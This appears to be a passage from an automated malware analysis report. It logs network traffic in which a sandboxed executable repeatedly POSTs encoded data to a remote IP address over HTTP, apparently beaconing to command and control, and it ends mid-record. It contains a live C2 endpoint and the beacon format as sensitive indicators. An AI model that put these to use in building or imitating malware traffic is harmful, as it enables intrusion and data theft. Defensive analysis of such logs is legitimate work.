                                                                                          Dec 10, 2024 07:29:25.757189035 CET2512OUTData Raw: 57 5c 5a 5f 5e 5b 55 5e 58 57 5a 57 52 53 51 50 5b 5c 5d 46 57 55 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\Z_^[U^XWZWRSQP[\]FWUP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"1??!9%"&>*-7%?4X$*$"><('=4</9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:26.670553923 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:26.904870033 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          50192.168.2.849829147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:27.400634050 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:27.757231951 CET2512OUTData Raw: 52 59 5f 52 5e 5f 55 51 58 57 5a 57 52 50 51 51 5b 5c 5d 47 57 5f 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RY_R^_UQXWZWRPQQ[\]GW_PT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2?#)!5&*/^$<;$4R"9X)(++14!#Z99.\%!Z+0
                                                                                          Dec 10, 2024 07:29:28.661206961 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:28.900579929 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          51192.168.2.849830147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:28.363713026 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:28.710391045 CET1992OUTData Raw: 57 5f 5f 5d 5b 5f 55 5e 58 57 5a 57 52 55 51 57 5b 5a 5d 41 57 57 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__][_U^XWZWRUQW[Z]AWWP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%<47)#6=)#]$(Y06-Y+;?*6 2-).\%!Z+(
                                                                                          Dec 10, 2024 07:29:29.624738932 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:29.856539965 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5b 37 07 2b 12 26 0d 2c 54 38 0f 2f 51 26 3d 23 43 3e 31 3a 5d 26 16 3f 17 2e 21 3c 0d 29 5b 2d 11 28 14 38 54 3e 11 30 0c 30 35 21 46 0c 1d 24 17 26 3b 26 5c 27 3d 05 5c 26 3c 3f 1d 27 32 15 14 3e 0a 2c 52 37 33 2b 5d 27 0d 34 1d 38 2d 2e 1e 2f 1c 26 09 2a 54 32 54 31 12 22 57 0d 12 27 53 25 30 39 13 37 32 03 0f 22 57 27 0b 29 35 3b 00 30 00 27 58 22 5c 39 5a 27 22 27 02 20 37 05 07 2b 15 21 00 32 3e 22 1b 24 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%[7+&,T8/Q&=#C>1:]&?.!<)[-(8T>005!F$&;&\'=\&<?'2>,R73+]'48-./&*T2T1"W'S%0972"W')5;0'X"\9Z'"' 7+!2>"$; ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          52192.168.2.849832147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:29.193119049 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:29.734828949 CET2512OUTData Raw: 57 59 5f 5e 5e 5a 50 5a 58 57 5a 57 52 51 51 56 5b 51 5d 43 57 54 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WY_^^ZPZXWZWRQQV[Q]CWTPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1'#9)!P">=3Z';'94U!<(++6 T7:.\%!Z+4
                                                                                          Dec 10, 2024 07:29:30.609009027 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:30.680636883 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          53192.168.2.849837147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:30.926366091 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:31.272794962 CET2512OUTData Raw: 57 50 5a 5d 5b 5f 55 50 58 57 5a 57 52 57 51 5d 5b 5e 5d 40 57 52 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZ][_UPXWZWRWQ][^]@WRP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2,<[ :*6X*><$,'0:4"==]?8=&!2#:).\%!Z+,
                                                                                          Dec 10, 2024 07:29:32.191138983 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:32.422295094 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          54192.168.2.849843147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:32.930074930 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:33.291984081 CET2512OUTData Raw: 57 5e 5f 5a 5e 5e 55 5f 58 57 5a 57 52 51 51 53 5b 5b 5d 41 57 52 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^_Z^^U_XWZWRQQS[[]AWRP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z2?/4&Q6>=,$/ 0*W!![+8 =;&#17:).\%!Z+4
                                                                                          Dec 10, 2024 07:29:34.198673964 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:34.437215090 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          55192.168.2.849848147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:34.905143976 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:35.371032000 CET2512OUTData Raw: 52 59 5a 5a 5e 58 50 5d 58 57 5a 57 52 52 51 5d 5b 58 5d 40 57 51 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RYZZ^XP]XWZWRRQ][X]@WQPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_&/#:>W"**-<3?00:$W!=%X<8)]" ;-.\%!Z+
                                                                                          Dec 10, 2024 07:29:36.068142891 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:36.300837040 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          56192.168.2.849850147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:35.171231985 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:35.645988941 CET2004OUTData Raw: 57 5e 5f 5f 5b 59 50 5c 58 57 5a 57 52 56 51 54 5b 5b 5d 47 57 53 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^__[YP\XWZWRVQT[[]GWSP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%$\ *%#&9^*=#'< \08W!![+,*+!Z!!'-.\%!Z+(
                                                                                          Dec 10, 2024 07:29:36.347218990 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:36.584733009 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 07 20 39 37 5b 26 33 0d 0f 2f 1f 38 09 25 2d 3b 41 3e 22 04 5d 25 16 3c 04 2d 22 3f 1f 2a 03 2d 58 3c 04 38 55 3d 11 23 1f 27 25 21 46 0c 1d 24 15 26 28 32 5e 24 3e 38 05 33 3c 23 5b 24 1c 20 07 3d 0d 3c 19 37 55 33 5c 24 20 3b 0f 2d 3d 3a 13 38 43 3e 44 3e 0c 00 54 26 28 22 57 0d 12 24 0b 24 30 25 1c 37 32 22 1d 35 1f 09 0e 3c 36 2f 02 33 58 38 05 21 14 29 1e 24 57 3c 12 20 34 20 1c 2b 15 39 03 31 3d 03 0b 24 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98& 97[&3/8%-;A>"]%<-"?*-X<8U=#'%!F$&(2^$>83<#[$ =<7U3\$ ;-=:8C>D>T&("W$$0%72"5<6/3X8!)$W< 4 +91=$+ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          57192.168.2.849855147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:36.564995050 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:36.913496017 CET2512OUTData Raw: 57 5a 5a 59 5e 5f 55 50 58 57 5a 57 52 53 51 53 5b 5c 5d 43 57 57 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZZY^_UPXWZWRSQS[\]CWWPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%Y4 *6W"P&(>$Y'\'6<;$=&#"+/9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:37.826808929 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:38.064749002 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          58192.168.2.849858147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:38.728507042 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:39.085346937 CET2512OUTData Raw: 57 59 5f 53 5e 55 55 5f 58 57 5a 57 52 51 51 5c 5b 59 5d 40 57 57 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WY_S^UU_XWZWRQQ\[Y]@WWP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2$] ::U!=[=-,%?8$\$S6%X)83)]"!"/9.\%!Z+4
                                                                                          Dec 10, 2024 07:29:39.991241932 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:40.224749088 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          59192.168.2.849864147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:40.509665012 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:41.063883066 CET2512OUTData Raw: 52 59 5a 5f 5e 5b 55 5e 58 57 5a 57 52 5d 51 56 5b 5f 5d 43 57 5f 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RYZ_^[U^XWZWR]QV[_]CW_P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]2?? &5P=*>#_3<8^0*!X!](8*+X#1;\:9.\%!Z+
                                                                                          Dec 10, 2024 07:29:41.770759106 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:42.005031109 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          60192.168.2.849869147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:41.846612930 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:42.203541994 CET2004OUTData Raw: 57 5e 5a 59 5e 58 55 5f 58 57 5a 57 52 5d 51 52 5b 59 5d 48 57 53 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^ZY^XU_XWZWR]QR[Y]HWSP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%/ \!9"#&!^)/'/^$(5.><+/>4"X:.\%!Z+
                                                                                          Dec 10, 2024 07:29:43.085283995 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:43.320847988 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5e 37 39 0e 04 25 1d 23 0e 2f 21 01 51 31 3e 2b 07 2a 31 2e 5d 27 38 37 5d 3a 0b 27 50 3e 3d 29 5c 29 29 3b 0f 2a 2f 30 0f 30 35 21 46 0c 1d 27 01 27 05 04 5f 30 04 33 5c 27 3f 0e 06 30 1c 11 14 3d 0d 0a 55 20 1d 27 5d 33 0a 27 0d 2d 2d 2e 13 2e 35 0c 41 29 0c 0c 11 26 12 22 57 0d 12 24 0a 26 20 35 5f 20 1c 08 51 23 32 37 0d 28 26 3c 5d 27 58 37 10 36 03 21 10 33 32 20 5e 23 34 3f 02 2b 3b 26 5b 26 5b 39 0b 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%^79%#/!Q1>+*1.]'87]:'P>=)\));*/005!F''_03\'?0=U ']3'--..5A)&"W$& 5_ Q#27(&<]'X76!32 ^#4?+;&[&[9$ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          61192.168.2.849870147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:42.270427942 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:42.655054092 CET2504OUTData Raw: 52 5c 5f 5f 5e 58 55 51 58 57 5a 57 52 55 51 5c 5b 59 5d 42 57 5e 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
